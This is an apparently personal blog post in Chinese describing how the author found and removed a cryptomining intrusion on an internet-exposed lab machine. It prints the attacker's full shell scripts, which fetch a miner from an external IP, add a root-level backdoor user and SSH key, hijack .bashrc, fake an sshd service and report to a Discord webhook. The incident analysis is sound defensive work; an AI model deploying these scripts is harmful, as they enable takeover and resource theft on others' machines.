记一次 挖矿程序入侵和处理
为了方便远程使用,师弟把实验室的电脑映射的公网上,结果被植入了挖矿程序
挖矿软件是这个,因为已经被清理掉了,所以看不到运行了,不然的话,使用 nvidia-smi 命令可以看到这个挖矿程序在工作。
然后进入到这个进程中, cd /proc/$PID , 查看它的信息
首先查看所有文件,可以看到挖矿程序被放到这个位置
通过 cat status 可以查看进程信息
其中PPID标识了进程的父类信息,这里我是在复现,所以父进程是4168,原本父进程是 2
然后把父进程杀死,把挖矿进程杀死,杀死挖矿程序。结果过一会挖矿程序又出现了,推测有定时执行任务,并且重启也不行。
首先查看开机自启脚本是否正常
vim /etc/rc.local
这个文件是正常的,说明不是放到这的。
然后检查root账户的 .bashrc 文件
vim ~/.bashrc
里面只有这么几行,这个明显是屏蔽掉了删除命令。切换到root账户,发现很多命令都被屏蔽掉了,那么肯定是出问题,但是这个文件又没有
运行挖矿程序。考虑定时任务,查看是否设置了crontab
ps -aux | grep crontab
发现果然存在定时任务,然后查看一下定时任务
crontab -e
可以看到这几个奇怪的任务,这里我给注释掉了
然后到 /var/tmp/.tmp/下看这几个文件
#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd /var/tmp/.tmp/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1
#!/bin/bash ###Date### user="sclipicibosu" pass="saieilamuie" gilimea='"' ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me` rm -rf *timeout sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu" nenea=`whoami` uptime=$(</proc/uptime) uptime=${uptime%%.*} zile=$(( uptime/60/60/24 )) secunde=$(( uptime%60 )) minute=$(( uptime/60%60 )) ore=$(( uptime/60/60%24 )) sended=$(date +'%m/%d/%Y') url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj' ########## getingmineru(){ locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)" if [ -f $locatie/PhoenixMiner ]; then : else curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar tar xvf PhoenixMiner.tar chmod 777 PhoenixMiner/* fi } ### locationperfection(){ tinlex=$(pwd) mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1 echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35" if [ $(id -u) = 0 ]; then if [ -f "/usr/bin/.locationesclipiciu" ]; then : else echo $tinlex > "/usr/bin/.locationesclipiciu" fi fi } ### showproof(){ echo ' { "content": null, "embeds": [ { "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ", "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**", "color": 16711680 } ] }' > /tmp/.send.json /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url } ### sshkiller(){ if [ $(id -u) = 0 ]; then mkdir /usr/.SQL-Unix mkdir /usr/.SQL-Unix/.SQL echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /usr/.SQL-Unix/.SQL/.db echo "# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys echo $sshkey > "/root/.ssh/authorized_keys" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh/authorized_keys else mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1 mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1 echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /var/tmp/.SQL-Unix/.SQL/.db echo "# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile fi } ### facuser(){ if [ $(id -u) = 0 ]; then if ! cat /etc/passwd | grep -q "${user}"; then /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user yes "$pass" | passwd $user else : fi fi } ### minerinio(){ locatie="$(pwd)" if [ -f $locatie/.b4nd1d0 ] then locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 else locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 fi } ### crontablegend() { locatie="$(pwd)" if ! crontab -l | grep -q '.placi'; then rm -rf $locatie/.5p4rk3l5 echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5 sleep 1 echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "@monthly "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 crontab $locatie/.5p4rk3l5 sleep 1 source ~/.bashrc rm -rf $locatie/.5p4rk3l5 fi } ### locationperfection sleep 0.5 echo "Locatie ON" wait getingmineru sleep 0.5 echo "Minerul Luat" wait facuser sleep 0.5 echo "User Facut" wait sshkiller sleep 0.5 echo "SSH Mort" wait showproof sleep 0.5 echo "Info Trimis" wait crontablegend sleep 0.5 echo "Crontab Done" wait minerinio sleep 0.5 echo "Minerul Pornit" wait ### checkingpid(){ if [ -f /usr/bin/.pidsclip ]; then if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then echo "Already running..." else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi } ### killingstrangers(){ echo ' #!/bin/bash locatieasdf=$(cat /usr/bin/.locationesclipiciu) if [ ! -d '$locatieasdf' ]; then mkdir '$locatieasdf' rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown else if [ ! -f '$locatieasdf'/PhoenixMiner ]; then rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown fi' > /usr/bin/sshd sleep 1 chmod 777 /usr/bin/sshd } ### pisamsystemu(){ echo '[Unit] Description=Example systemd service. [Service] Type=simple Restart=always RestartSec=3600 ExecStart=/bin/bash /usr/bin/sshd [Install] WantedBy=multi-user.target' > /lib/systemd/system/myservice.service sleep 1 chmod 644 /lib/systemd/system/myservice.service systemctl enable myservice systemctl start myservice if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then echo "Locatia este deja setata" else if [ -f "/usr/bin/.locationesclipiciu" ]; then locationperfection echo "Am-rupt-locatiile-alea" sleep 1 fi fi if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then if [ -d "/var/tmp/.ladyg0g0" ]; then locationperfection locationperfection echo "Locatia a fost setata" else echo "Acum facem folderul" mkdir /var/tmp/.ladyg0g0/ locationperfection locationperfection echo "Am setat locatia" fi fi if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then echo "Already running..." else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi } ### if [ $(id -u) = 0 ]; then if [ ! -d /usr/bin/.locationesclipiciu ]; then cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown' if [ ! -f /usr/bin/sshd ]; then killingstrangers pisamsystemu checkingpid fi fi fi ###
可以看到这个人果然是在这里做了些操作,然后它把.bashrc文件重写,这也是我们之前查看没有直接发现问题的原因。其实如果它把.bashrc先备份一下,
然后执行完病毒再恢复,这样会更隐蔽。可能是个新手叭(虽然我找这个病毒也是找了好久。。)
至此,挖矿病毒就被清理掉了,吓的我也是赶紧把内网映射关掉了。果然有的人为了钱,啥事都能干。。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 字符编码:从基础到乱码解决
2020-05-28 leetcode 394 解码
2016-05-28 hdu 1017 A Mathematical Curiosity
2016-05-28 hdu1016 Prime Ring Problem
2016-05-28 hdu 1015 Safecracker